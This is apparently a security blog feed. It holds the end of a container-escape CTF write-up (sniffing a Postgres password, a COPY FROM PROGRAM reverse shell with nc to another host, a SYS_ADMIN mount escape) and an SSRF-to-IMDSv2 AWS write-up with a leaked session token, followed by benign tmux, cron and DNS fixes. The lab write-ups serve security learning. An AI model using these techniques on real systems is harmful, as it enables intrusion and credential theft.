class="err">@</span><span class="p">.............</span><span class="mf">.8</span><span class="p">..</span><span class="nx">Bp8</span><span class="o">?</span><span class="p">........</span><span class="nx">X</span><span class="p">......</span> </span></span><span class="line"><span class="cl"><span class="nx">N</span><span class="p">..</span><span class="o">|</span><span class="nx">U</span><span class="p">...</span><span class="nx">T</span><span class="p">......</span><span class="nx">now</span><span class="p">...................</span><span class="nx">D</span><span class="p">...</span><span class="err">&#39;</span><span class="p">......</span><span class="mi">2025</span><span class="o">-</span><span class="mi">08</span><span class="o">-</span><span class="mi">02</span> <span class="mi">07</span><span class="o">:</span><span class="mi">42</span><span class="o">:</span><span class="mf">13.737742</span><span class="o">+</span><span class="mi">00</span><span class="nx">C</span><span class="p">....</span><span class="nx">SELECT</span> <span class="mf">1.</span><span class="nx">Z</span><span class="p">....</span><span class="nx">I</span> </span></span><span class="line"><span class="cl"><span class="mi">07</span><span class="o">:</span><span class="mi">42</span><span class="o">:</span><span class="mf">13.737886</span> <span class="nx">IP</span> <span class="mi">2</span><span class="nx">a97544bda27</span><span class="mf">.39682</span> <span class="o">&gt;</span> <span class="nx">postgres_db</span><span class="p">.</span><span class="nx">user_db_network</span><span class="p">.</span><span class="nx">postgresql</span><span class="o">:</span> <span class="nx">Flags</span> <span class="p">[.],</span> <span class="nx">ack</span> <span class="mi">90</span><span class="p">,</span> <span class="nx">win</span> <span class="mi">501</span><span class="p">,</span> <span class="nx">options</span> <span class="p">[</span><span class="nx">nop</span><span class="p">,</span><span class="nx">nop</span><span class="p">,</span><span class="nx">TS</span> <span class="nx">val</span> <span class="mi">1427675159</span> <span class="nx">ecr</span> <span class="mi">1317736572</span><span class="p">],</span> <span class="nx">length</span> <span class="mi">0</span> </span></span></code></pre></div><p>The traffic is unencrypted (insecure defaults!) and there appears to be a couple of queries running every 5 seconds. It could be scheduled via a cron. This means we are on the right track!</p> <p>Maybe if we try to break this connection, we could see something interesting? There are a couple of ways to go about doing this:</p> <ol> <li>Using scapy</li> <li><code>tcpkill</code></li> </ol> <p>Using tcpkill is the easiest way.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">root@2ec90dab9eee:/# tcpkill -i eth0 -9 port <span class="m">5432</span> </span></span><span class="line"><span class="cl">^Z </span></span><span class="line"><span class="cl">root@2ec90dab9eee: <span class="nb">bg</span> %1 <span class="c1"># to background the task</span> </span></span><span class="line"><span class="cl">root@2ec90dab9eee:/# tcpdump -A </span></span><span class="line"><span class="cl">09:13:02.318439 IP 2ec90dab9eee.54270 &gt; postgres_db.user_db_network.postgresql: Flags <span class="o">[</span>P.<span class="o">]</span>, seq 9:70, ack 2, win 502, options <span class="o">[</span>nop,nop,TS val <span class="m">37975253</span> ecr 3799587605<span class="o">]</span>, length <span class="m">61</span> </span></span><span class="line"><span class="cl">E..q.M@................8.... .......X...... </span></span><span class="line"><span class="cl">.Ct..y.....<span class="o">=</span>....user.user.database.mydatabase.application_name.psql.. </span></span><span class="line"><span class="cl">09:13:02.319155 IP postgres_db.user_db_network.postgresql &gt; 2ec90dab9eee.54270: Flags <span class="o">[</span>P.<span class="o">]</span>, seq 2:11, ack 70, win 509, options <span class="o">[</span>nop,nop,TS val <span class="m">3799587605</span> ecr 37975253<span class="o">]</span>, length <span class="m">9</span> </span></span><span class="line"><span class="cl">E..<span class="o">=</span>J.@...X..........8.. ...........X<span class="o">[</span>..... </span></span><span class="line"><span class="cl">.y...Ct.R........ </span></span><span class="line"><span class="cl">09:13:02.319180 IP 2ec90dab9eee.54270 &gt; postgres_db.user_db_network.postgresql: Flags <span class="o">[</span>P.<span class="o">]</span>, seq 70:100, ack 11, win 502, options <span class="o">[</span>nop,nop,TS val <span class="m">37975253</span> ecr 3799587605<span class="o">]</span>, length <span class="m">30</span> </span></span><span class="line"><span class="cl">E..R.N@....+...........8.... .......Xp..... </span></span><span class="line"><span class="cl">.Ct..y..p....<span class="o">[</span>REDACTED PASSWORD<span class="o">]</span>. </span></span></code></pre></div><p>As I suspected, the process tries to re-connect once the connection gets terminated. We find the password to the Postgres DB… AND the db name. Now we have the required details to connect to the DB:</p> <ul> <li><strong>DB:</strong> mydatabase</li> <li><strong>Password:</strong> [REDACTED]</li> <li><strong>User:</strong> user</li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">root@2ec90dab9eee:/# psql -h postgres_db -U user -d mydatabase </span></span><span class="line"><span class="cl">Password <span class="k">for</span> user user: </span></span><span class="line"><span class="cl">psql <span class="o">(</span>16.9 <span class="o">(</span>Ubuntu 16.9-0ubuntu0.24.04.1<span class="o">)</span>, server 16.8<span class="o">)</span> </span></span><span class="line"><span class="cl">Type <span class="s2">&#34;help&#34;</span> <span class="k">for</span> help. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">mydatabase</span><span class="o">=</span><span class="c1"># </span> </span></span></code></pre></div><p>Logged in!</p> <p>For arbitrary command execution we can throw a reverse shell to our first container (do remember to background the <code>psql</code> process and start a Netcat listener using <code>nc -nlvp &lt;PORT&gt;</code> ) -</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">CREATE</span><span class="w"> </span><span class="k">TABLE</span><span class="w"> </span><span class="n">shell</span><span class="p">(</span><span class="k">output</span><span class="w"> </span><span class="nb">text</span><span class="p">);</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="k">COPY</span><span class="w"> </span><span class="n">shell</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">PROGRAM</span><span class="w"> </span><span class="s1">&#39;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 172.19.0.2 1337 &gt;/tmp/f&#39;</span><span class="p">;</span><span class="w"> </span></span></span></code></pre></div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">Ncat: Connection from 172.19.0.2:39309 </span></span><span class="line"><span class="cl">/bin/sh: can<span class="err">&#39;</span>t access tty<span class="p">;</span> job control turned off </span></span><span class="line"><span class="cl">~/data $ id </span></span></code></pre></div><p>Got the reverse shell. Successfully moved laterally! Now to get out of the container and onto the host.</p> <p>We see that we have a shell as <code>postgres</code> user.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">~/data $ id </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>70<span class="o">(</span>postgres<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>70<span class="o">(</span>postgres<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>10<span class="o">(</span>wheel<span class="o">)</span>,70<span class="o">(</span>postgres<span class="o">)</span> </span></span></code></pre></div><p><code>sudo -l</code> shows that we can run <code>sudo</code> without getting a password prompt on all binaries.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">~/data $ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> postgres on 032c93ff87db: </span></span><span class="line"><span class="cl"> <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Runas and Command-specific defaults <span class="k">for</span> postgres: </span></span><span class="line"><span class="cl"> Defaults!/usr/sbin/visudo <span class="nv">env_keep</span><span class="o">+=</span><span class="s2">&#34;SUDO_EDITOR EDITOR VISUAL&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User postgres may run the following commands on 032c93ff87db: </span></span><span class="line"><span class="cl"> <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: ALL </span></span></code></pre></div><p>Looking into our process&rsquo;s capabilities we see that it has all dangerous capabilities (SYS_MODULE,SYS_ADMIN, SYS_PTRACE..).</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ capsh --print </span></span><span class="line"><span class="cl"><span class="o">[</span>.. SNIP .. <span class="o">]</span> </span></span><span class="line"><span class="cl">cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read </span></span><span class="line"><span class="cl"><span class="o">[</span>.. SNIP ..<span class="o">]</span> </span></span></code></pre></div><p>Let’s exploit <code>SYS_ADMIN</code> by mounting <code>/dev/vda</code> to <code>/mnt</code> and checking the file system.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ mount /dev/vda /mnt </span></span><span class="line"><span class="cl">$ ls /mnt </span></span><span class="line"><span class="cl">ls /mnt </span></span><span class="line"><span class="cl">bin </span></span><span class="line"><span class="cl">boot </span></span><span class="line"><span class="cl">dev </span></span><span class="line"><span class="cl">etc </span></span><span class="line"><span class="cl">flag </span></span><span class="line"><span class="cl">home </span></span><span class="line"><span class="cl">lib </span></span><span class="line"><span class="cl">lib32 </span></span><span class="line"><span class="cl">lib64 </span></span><span class="line"><span class="cl">libx32 </span></span><span class="line"><span class="cl">lost+found </span></span><span class="line"><span class="cl">media </span></span><span class="line"><span class="cl">mnt </span></span><span class="line"><span class="cl">opt </span></span><span class="line"><span class="cl">overlay </span></span><span class="line"><span class="cl">proc </span></span><span class="line"><span class="cl">rom </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">run </span></span><span class="line"><span class="cl">sbin </span></span><span class="line"><span class="cl">srv </span></span><span class="line"><span class="cl">sys </span></span><span class="line"><span class="cl">tmp </span></span><span class="line"><span class="cl">usr </span></span><span class="line"><span class="cl">var </span></span></code></pre></div><p>It works and we can <code>cat</code> the flag at <code>/flag</code>.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">$ cat /mnt/flag </span></span><span class="line"><span class="cl">WIZ_CTF<span class="o">{</span>REDACTED<span class="o">}</span> </span></span></code></pre></div>Perimeter Leak - The Ultimate Cloud Security Championshiphttps://zerodaywolf.sh/writeups/tucsc-ch01-perimeter-leak/Sat, 05 Jul 2025 12:20:00 +0530<p><img src="https://zerodaywolf.sh/gallery/tucsc-perimeter-leak/01-chal-desc.png" alt=""></p> <h2 id="initial-discovery">initial discovery</h2> <p>The message in the console:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">You<span class="err">&#39;</span>ve discovered a Spring Boot Actuator application running on AWS: curl https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com </span></span><span class="line"><span class="cl"><span class="o">{</span><span class="s2">&#34;status&#34;</span>:<span class="s2">&#34;UP&#34;</span><span class="o">}</span> </span></span></code></pre></div><p>Running the <code>curl</code> gives us a basic welcome message.</p> <p><img src="https://zerodaywolf.sh/gallery/tucsc-perimeter-leak/02-curl-output.png" alt=""></p> <p>The earlier message did talk about the application being a Spring Boot Actuator. From the <a href="https://docs.spring.io/spring-boot/reference/actuator/index.html#actuator">documentation</a>:</p> <blockquote> <p>Spring Boot includes a number of additional features to help you monitor and manage your application when you push it to production. You can choose to manage and monitor your application by using HTTP endpoints or with JMX. Auditing, health, and metrics gathering can also be automatically applied to your application.</p></blockquote> <p>There must be some endpoints that such an application would expose by default. After a little bit of digging I found a few that looked interesting:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">/actuator/env - Application runtime environment information </span></span><span class="line"><span class="cl">/actuator/mappings - Application<span class="err">&#39;</span>s request mappings </span></span></code></pre></div><p>Let&rsquo;s see if these are left public.</p> <h2 id="exploring-actuator-endpoints">exploring actuator endpoints</h2> <p>Querying them gave me some useful information:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">curl https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/actuator/env <span class="p">|</span> jq . </span></span></code></pre></div><p><img src="https://zerodaywolf.sh/gallery/tucsc-perimeter-leak/03-bucket-found.png" alt=""></p> <p><strong>Bucket:</strong> challenge01-470f711</p> <p>If you recall the description of the challenge, it indicates that we <em>are</em> looking for an s3 bucket which contains our flag!</p> <p>Let&rsquo;s use the <code>aws</code> cli to list the objects in this bucket:</p> <p><img src="https://zerodaywolf.sh/gallery/tucsc-perimeter-leak/04-list-challenge-bucket.png" alt=""></p> <p>It&rsquo;s a private bucket. We need credentials.</p> <p>Looking at the other actuator endpoint:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">curl https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/actuator/mappings <span class="p">|</span> jq <span class="s1">&#39;.&#39;</span> </span></span></code></pre></div><p><img src="https://zerodaywolf.sh/gallery/tucsc-perimeter-leak/05-actuator-mappings.png" alt=""></p> <p>It appears we have found the proxy application&rsquo;s endpoint - <code>/proxy</code> which accepts a parameter <code>url</code>. Looks like we got ourselves an SSRF.</p> <p>Let&rsquo;s check if the proxy is actually working by checking the IP.</p> <p><img src="https://zerodaywolf.sh/gallery/tucsc-perimeter-leak/06-curl-ipv4.png" alt=""></p> <p>This is interesting. The <a href="https://owasp.org/www-community/attacks/Server_Side_Request_Forgery">SSRF</a> works, but the proxy only accepts IPs and requests to <code>*.amazonaws.com</code>.</p> <h2 id="exploiting-ssrf-against-imdsv2">exploiting ssrf against IMDSv2</h2> <p>Since the author mentioned that the application is running on AWS, let&rsquo;s hit the IMDS endpoint <code>169.254.169.254</code> to see if we can fetch the temporary access credentials.</p> <p><img src="https://zerodaywolf.sh/gallery/tucsc-perimeter-leak/07-curl-imds.png" alt=""></p> <p>Ah, a 401! This probably means IMDSv2 is enabled. Luckily for us, the previous message said that the proxy passed along headers and request types from the original request. This means we can still exploit the SSRF to gain unauthorized access to the AWS account. Here&rsquo;s a great blog on that - <a href="https://www.yassineaboukir.com/blog/exploitation-of-an-SSRF-vulnerability-against-EC2-IMDSv2/">https://www.yassineaboukir.com/blog/exploitation-of-an-SSRF-vulnerability-against-EC2-IMDSv2/</a>.</p> <p>The PUT request to get the metadata token:</p> <p><img src="https://zerodaywolf.sh/gallery/tucsc-perimeter-leak/08-curl-imdsv2.png" alt=""></p> <p>All consequent requests to the IMDS endpoint are sent with the <code>x-aws-ec2-metadata-token</code> header:</p> <p><img src="https://zerodaywolf.sh/gallery/tucsc-perimeter-leak/09-curl-imdsv2-2.png" alt=""></p> <p>We can now get the security-credentials for the role attached to the instance:</p> <p><img src="https://zerodaywolf.sh/gallery/tucsc-perimeter-leak/10-curl-imdsv2-3.png" alt=""></p> <h2 id="accessing-s3-via-presigned-url">accessing s3 via presigned url</h2> <p>Configure it in the AWS CLI and try to get the flag at the prefix <code>private/flag.txt</code>. It fails:</p> <p><img src="https://zerodaywolf.sh/gallery/tucsc-perimeter-leak/11-s3-ls-bucket.png" alt=""></p> <p>It appears a Bucket Policy denies any request coming from a source other than the VPC endpoint to run <code>GetObject</code> on objects inside the <code>private/</code> prefix.</p> <p><img src="https://zerodaywolf.sh/gallery/tucsc-perimeter-leak/12-bucket-policy.png" alt=""></p> <p>We have credentials, but just need to get it through the proxy. There are <a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sig-v4-authenticating-requests.html#auth-methods-intro">2 ways to express authentication to S3</a>:</p> <ul> <li>HTTP Authorization Header</li> <li>Query string parameters (AKA Presigned URL)</li> </ul> <p>Since in the <code>curl</code> request we are already sending an <code>Authorization</code> header to authenticate to the proxy, we cannot send another to AWS via the proxy. We can create a presigned URL via the temporary role credentials and pass it along to the proxy.</p> <p>Create the presigned URL:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">aws s3 presign s3://challenge01-470f711/private/flag.txt --expires-in <span class="m">3600</span> --region us-east-1 </span></span></code></pre></div><p><img src="https://zerodaywolf.sh/gallery/tucsc-perimeter-leak/13-presign-url.png" alt=""></p> <p>Send it through the proxy service:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">curl -s -H <span class="s1">$&#39;Host: challenge01.cloud-champions.com&#39;</span> -H <span class="s1">$&#39;Authorization: Basic Y3RmOjg4c1BWV3lDMlAzcA==&#39;</span> <span class="s1">$&#39;https://challenge01.cloud-champions.com/proxy?url=https%3a//challenge01-470f711.s3.us-east-1.amazonaws.com/private/flag.txt%3fX-Amz-Algorithm%3dAWS4-HMAC-SHA256%26X-Amz-Credential%3dASIARK7LBOHXOUAOHHGT%252F20250726%252Fus-east-1%252Fs3%252Faws4_request%26X-Amz-Date%3d20250726T131902Z%26X-Amz-Expires%3d3600%26X-Amz-SignedHeaders%3dhost%26X-Amz-Security-Token%3dIQoJb3JpZ2luX2VjEDUaCXVzLWVhc3QtMSJIMEYCIQDXcSfCyj9InuS2bfRvpwLih0LX3NN6Ol4t66oBYXXDBAIhAIjthVfQc2lR8Ewdz0ng32U0CB44Ouu9815U%252FP7XrC%252BXKrgFCF0QABoMMDkyMjk3ODUxMzc0IgyNtQ8rpsace4R67pMqlQXU2Vu4KHaLYNYo77C%252F2dyaCpA5JejPBCLAZTIDwAAm0AhFs0gftVEip%252FzVTtE3S4Fmcimh%252F46MTiTgaSNpb2ppTw0IWB%252BbsG505amvApXE4acnTSVgUd%252BPrMINqusejAMOujn25UiuFNRNEK%252BXhpOokON656ZJMXWSegRfvto3UVqR16spi6zKl3%252BwI7FD4wYtWFsnLuS%252BLVFAE6xBjFWr%252F8o1ta71XsMSHv6pSnGXODhCOYZPZMahpIWQde3jh0vqv65hGAoT%252FjK5cJHazZhVtWfikYb%252F2CEEh8WMY%252FBfpy2xmvn%252FjqkPF4sncwL85E0lSgMAlIP7i7MJbUvz57kpI9kUQNl2b9D49QJcA0YubQi%252BCPlw7z%252FcddN1kzqXWg%252FA9DqD8NHn5sgA1EvyWQ4y4nPt6mbJdy2odvO5jyR%252B%252F4s5WPBvfnN7mJCngPDcjvXgsSM9W%252FxRupqZzC0fuVnDVo6%252BKZ2Eof8DjCM%252FaV%252BlQHz%252FwMOYJLSC5eyrmIvNV2tRDeyWaIHcLTWFHUGwx%252F6d2V0Dgw7OtI6iFoU5otc0a0UVttjmfaaKJcHxuWnKSAXMiQL0gMxAZp8qYydtCIgyF2AYEQk1pajPgdxVu7pv0Pv4b1goyTxy8WjYaX8M0mhsKRe0tDsS%252Fm3lHhtIDWPpL7IdLtWptDDK63%252B85a9eNkQE7%252F7g0sPHB8E3RBFbAvPtzDoUrlhCr93eO8nKoxPwlKXCEEkEYTSHdnFoA0%252F3He8pfi2PJMxAWJ3ZPs7MqDpelhqvxwFrojhVIOy5FjY68i1X%252FS260f7lEZ7RzRThLRa2y6AOP0QakvcowKWoSrOlYwhJ1koULzZyIbz7gh6tD9HgQwbr3CMuwh2vWLnXg7gTQc%252BmMKiQk8QGOrABsrRH6d6JpyD1v91mVvT0hu%252BEvTMmebimPJLGbOIFmnJT4Ps1JEa0isymDzidPGyVlTBb1HxvgHhMd%252FEBdrji2pVPkD2oO1TBxOKYMpRveJ0XgSlaTIOnua7G%252BPhb9MoEQQNl5LM2BpEk1gHXBK2%252FeHpDDl1rMvJdQMYx47xTViCMnhJX4%252F4rH9uABR64LYh6KfJY638uimP2WGnpbGtxjvmYCMLPbgqCOqkm1UQDM2k%253D%26X-Amz-Signature%3d11471c6d9f2220d5d090a41f154e1bd9dcb96474b41cb7e0b522d2276a6d7620&#39;</span> </span></span></code></pre></div><p><img src="https://zerodaywolf.sh/gallery/tucsc-perimeter-leak/14-proxy-presigned-url.png" alt=""></p> <p>Bingo! Solved.</p>Fixing tmux Unicode and Italics Display Issueshttps://zerodaywolf.sh/debugs/tmux-not-rendering-italics-unicode/Sun, 13 Apr 2025 14:08:00 +0530<p>When tmux fails to properly display italics text or unicode characters.</p> <h2 id="root-cause">root cause</h2> <p>The issue occurs due to improper locale configuration in the shell environment.</p> <h2 id="solution">solution</h2> <p>Add the following to <code>~/.bashrc</code>:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">LC_ALL</span><span class="o">=</span>en_IN.UTF-8 </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">LANG</span><span class="o">=</span>en_IN.UTF-8 </span></span></code></pre></div><p>This sets the proper locale environment variables that tmux needs to correctly render italics and unicode characters.</p>Scripts Failing When Run via crontab -ehttps://zerodaywolf.sh/debugs/script-fails-in-cron/Fri, 28 Mar 2025 17:21:00 +0530<p>When scripts work perfectly when run manually but fail mysteriously when executed via cron.</p> <h2 id="root-cause">root cause</h2> <p>This happens because of the minimal environment that cron has - it runs with very limited PATH, environment variables, and shell context compared to your interactive shell.</p> <h2 id="solution">solution</h2> <p>Reference: <a href="https://stackoverflow.com/questions/20582224/shell-script-not-running-via-crontab-but-runs-fine-manually">https://stackoverflow.com/questions/20582224/shell-script-not-running-via-crontab-but-runs-fine-manually</a></p> <p><strong>The fix:</strong> Manually add it to <code>/etc/crontab</code> with the full path specification:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">*/10 * * * * ghost /bin/bash /home/scripts/run.sh </span></span></code></pre></div><p>This approach:</p> <ul> <li>Uses absolute paths for both the shell (<code>/bin/bash</code>) and script (<code>/home/scripts/run.sh</code>)</li> <li>Specifies the user (<code>ghost</code>) explicitly in the system crontab</li> <li>Avoids user-specific cron environment issues</li> </ul> <p><strong>Additional troubleshooting:</strong></p> <ul> <li>Source necessary profile files if needed</li> <li>Test scripts with <code>env -i</code> to simulate the minimal cron environment</li> </ul>Performance drop? Spike in CPU temp? Might be your fan!https://zerodaywolf.sh/debugs/pc-fan-overheating-fix/Fri, 28 Mar 2025 16:00:00 +0530<p>Troubleshooting performance problems caused by improper heatsink mounting.</p> <h2 id="symptoms">symptoms</h2> <ul> <li>Lag in games</li> <li>General performance issues</li> </ul> <h2 id="root-cause">root cause</h2> <p>If the heatsink fan is not fixed properly it causes overheating which causes lag in games and general performance issues.</p> <h2 id="solution">solution</h2> <p>Reseating the fan properly fixed it:</p> <ul> <li>twist the fan pegs to the left</li> <li>pull the fan pegs</li> <li>twist to the right</li> <li>push it in one by one</li> </ul>ACLs and cphttps://zerodaywolf.sh/debugs/recursively-assign-acl-linux/Sun, 23 Mar 2025 17:17:00 +0530<p>Set Access Control Lists (ACLs) that apply to directories and all future files created within them.</p> <h2 id="commands">commands</h2> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">sudo setfacl -R -d -m g:ghost:rwx /home/ghost </span></span><span class="line"><span class="cl">sudo setfacl -R -m g:ghost:rwx /home/ghost </span></span></code></pre></div><p>These commands apply to all new files and directories created recursively. The <code>-d</code> flag sets default ACLs for future files, while the second command applies to existing files.</p> <h2 id="shortcomings">shortcomings</h2> <ul> <li><code>cp</code> does not respect ACLs - see: <a href="https://serverfault.com/questions/183800/why-does-cp-not-respect-acls">https://serverfault.com/questions/183800/why-does-cp-not-respect-acls</a></li> </ul> <p>This means files copied with <code>cp</code> will lose their ACL settings and revert to standard permissions.</p>Fixing macOS DNS Resolution with Tailscalehttps://zerodaywolf.sh/debugs/macos-dns-tailscale-fix/Wed, 26 Feb 2025 13:19:00 +0530<p>Fixing DNS resolution issues when using Tailscale on macOS.</p> <h2 id="environment">environment</h2> <ul> <li>work laptop</li> <li>m4 pro</li> <li>OSX 15.3.1</li> </ul> <h2 id="solution">solution</h2> <ol> <li> <p><strong>Run tailscaled in a tmux session</strong> for better process management</p> </li> <li> <p><strong>Start tailscale with proper flags:</strong></p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">tailscale up --accept-dns --accept-routes </span></span></code></pre></div></li> <li> <p><strong>Configure macOS DNS resolver:</strong> Create <code>/etc/resolver/kenobi.lan</code> with <code>nameserver 100.100.100.100</code></p> </li> <li> <p><strong>Result:</strong> Now browsers can find <code>vault.kenobi.lan</code> and other internal domains</p> </li> </ol>.bashrc not sourced - tmux and login shellshttps://zerodaywolf.sh/debugs/bashrc-not-sourced-tmux/Fri, 03 Jan 2025 12:25:00 +0530<h2 id="problem">problem</h2> <p>I noticed that my <code>.bashrc</code> was not getting sourced in tmux sessions.</p> <h2 id="root-cause">root cause</h2> <p>Turns out that <code>.bashrc</code> is only sourced on non-login shells (see <code>man bash</code>). You can identify if a shell is a login shell with the following command:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl"><span class="nb">echo</span> <span class="nv">$-</span> </span></span><span class="line"><span class="cl"><span class="c1"># if output is -bash then its a login shell, else non-login shell</span> </span></span></code></pre></div><p><strong>The Issue:</strong> All my shells that tmux was spawning were login shells! Hence <code>.bashrc</code> was not sourced but rather <code>/etc/profile</code>, <code>.profile</code> were being sourced on each new terminal.</p> <h2 id="why-this-is-problematic">why this is problematic</h2> <p>See why that&rsquo;s not recommended: <a href="https://www.gridbugs.org/daily/tmux-runs-a-login-shell-by-default/">https://www.gridbugs.org/daily/tmux-runs-a-login-shell-by-default/</a></p> <p><strong>TL;DR:</strong> It&rsquo;s because things like variable expansion will get messed up. For example, <code>$PATH</code> is defined in <code>.profile</code> and usually it&rsquo;s defined with itself being concatenated at the end:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">PATH</span><span class="o">=</span>/bin:/sbin:<span class="si">${</span><span class="nv">PATH</span><span class="si">}</span> </span></span></code></pre></div><p>So each time a new login shell is spawned, the PATH variable is concatenated making it longer and longer.</p> <h2 id="the-fix">the fix</h2> <p>From <a href="https://www.gridbugs.org/daily/tmux-runs-a-login-shell-by-default/">https://www.gridbugs.org/daily/tmux-runs-a-login-shell-by-default/</a>:</p> <blockquote> <p>To have tmux run a non-login shell, add this to .tmux.conf:</p></blockquote> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">set</span> -g default-command <span class="s2">&#34;</span><span class="si">${</span><span class="nv">SHELL</span><span class="si">}</span><span class="s2">&#34;</span> </span></span></code></pre></div><h2 id="references">references</h2> <ul> <li><a href="https://discourse.nixos.org/t/bash-not-sourcing-bashrc/22859/6">https://discourse.nixos.org/t/bash-not-sourcing-bashrc/22859/6</a></li> <li><a href="http://hayne.net/MacDev/Notes/unixFAQ.html#shellStartup">http://hayne.net/MacDev/Notes/unixFAQ.html#shellStartup</a></li> <li><a href="https://www.gridbugs.org/daily/tmux-runs-a-login-shell-by-default/">https://www.gridbugs.org/daily/tmux-runs-a-login-shell-by-default/</a></li> </ul>Resolving DNS Conflicts with systemd-resolved and Tailscalehttps://zerodaywolf.sh/debugs/fix-dns-systemd-resolved/Fri, 01 Nov 2024 10:31:00 +0530<p>Resolving DNS configuration conflicts between NetworkManager, systemd-resolved, and Tailscale.</p> <h2 id="problem">problem</h2> <p>The DNS configuration was not applied correctly; the system continued using the DNS server provided by DHCP (192.168.1.1).</p> <h2 id="root-cause">root cause</h2> <p>NM was taking DNS from DHCP and sending it to <code>systemd-resolved</code> which had the stub resolver symlinked to resolv.conf.</p> <h2 id="solution">solution</h2> <h3 id="step-1-configure-systemd-resolved">step 1: configure systemd-resolved</h3> <ul> <li> <p>Enabled <code>systemd-resolved</code> and symlinked <code>/etc/resolv.conf</code> to <code>/run/systemd/resolve/resolv.conf</code>. Also disabled the stub-resolver because it was conflicting with Tailscale.</p> </li> <li> <p>Created <code>/etc/systemd/resolved.conf.d</code> directory and added <code>00-custom.conf</code> since <code>*.conf</code> files under <code>resolved.conf.d</code> are automatically read by <code>systemd-resolved</code>.</p> </li> </ul> <p><strong>File:</strong> <code>/etc/systemd/resolved.conf.d/00-custom.conf</code></p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl"><span class="o">[</span>Resolve<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">DNS</span><span class="o">=</span>1.1.1.1 </span></span><span class="line"><span class="cl"><span class="nv">DNSStubListener</span><span class="o">=</span>no </span></span></code></pre></div><h3 id="step-2-configure-networkmanager">step 2: configure networkmanager</h3> <p>NetworkManager was also taking DNS from DHCP and forwarding it to <code>systemd-resolved</code>, so the configuration needed to be modified. NM reads all drop-in <code>*.conf</code> files from <code>/etc/NetworkManager/conf.d/</code>.</p> <p><strong>File:</strong> <code>/etc/NetworkManager/conf.d/dns.conf</code></p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl"><span class="o">[</span>main<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">dns</span><span class="o">=</span>none </span></span><span class="line"><span 